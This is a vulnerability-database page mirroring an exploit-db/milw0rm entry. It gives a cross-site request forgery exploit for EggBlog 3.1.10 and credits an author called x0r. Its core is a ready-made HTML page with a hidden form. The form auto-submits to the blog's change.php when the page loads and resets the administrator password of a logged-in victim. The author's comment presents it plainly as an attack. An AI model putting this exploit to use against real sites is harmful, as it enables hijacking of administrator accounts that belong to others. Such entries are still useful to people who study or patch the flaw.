EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057206 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7633
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|                                                                        | 
| Project: EggBlog v 3.1.10                                              |
| Author: x0r                                                            |
| Email: andry2000[at]hotmail[dot]it                                     |
|________________________________________________________________________|
       
Code:

        <html>
        <title>x0r :P </title>
                        <form id="forum-form" name="forumform"
method="post" action="http://[site]/[path]/change.php">                    
    
                                                <input type="hidden"
size="30" id="forumpassword" name="password" />
                                                <input type="hidden"
name="submit" value="Submit" />
<script>document.forumform.submit()</script> 
       
                        </form>
        </HTML>

 With this csrf you can change the admin pass ^ ^

# milw0rm.com [2009-01-01]